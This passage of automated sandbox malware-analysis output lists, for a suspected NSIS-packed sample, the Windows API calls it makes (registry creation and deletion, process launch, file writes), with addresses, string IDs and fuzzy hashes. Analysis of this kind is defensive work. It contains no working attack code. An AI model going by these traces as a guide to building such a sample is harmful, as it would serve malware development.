                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061F3
                                                  • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 00406206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
                                                  • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
                                                  • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8
                                                  • API String ID: 1453599865-4194326291
                                                  • Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                  • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                  • Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                  • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                  • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                  • Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                  • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                  • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                  • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                  • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                  • Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                  • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                  • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                  • Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                  • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                  APIs
                                                  • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                  • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID: x>A
                                                  • API String ID: 539440098-3854404225
                                                  • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                  • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                  • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                  • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                  • wsprintfW.USER32 ref: 00404A10
                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                  • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                  • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                  • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                  • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                  • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                  • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                  • Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                  • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                  APIs
                                                    • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,74DF2EE0,00405790,?,00436800,74DF2EE0,00434000), ref: 004059EC
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                  • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3751793516-0
                                                  • Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                  • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                  • Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                  • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                  • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                  APIs
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                    • Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                    • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                  • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                  • Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                  • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405135
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405BA1
                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: a59ec1500bb3a057b0c7e458718f37cba2bd95e94ad133a2c1413d9473e84a55
                                                  • Instruction ID: ded6299056c6f152490b71f392ea8ff9cf2a02f35464ef5b7c9c2c32f1c5a63c
                                                  • Opcode Fuzzy Hash: a59ec1500bb3a057b0c7e458718f37cba2bd95e94ad133a2c1413d9473e84a55
                                                  • Instruction Fuzzy Hash: 20B11B34A00209CFDB18EB69C59469EB7F2AF88340F248D79D805AB355DB75EC86CF81
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • CloseHandle.KERNEL32(?), ref: 00405695
                                                  Strings
                                                  • Error launching installer, xrefs: 00405676
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
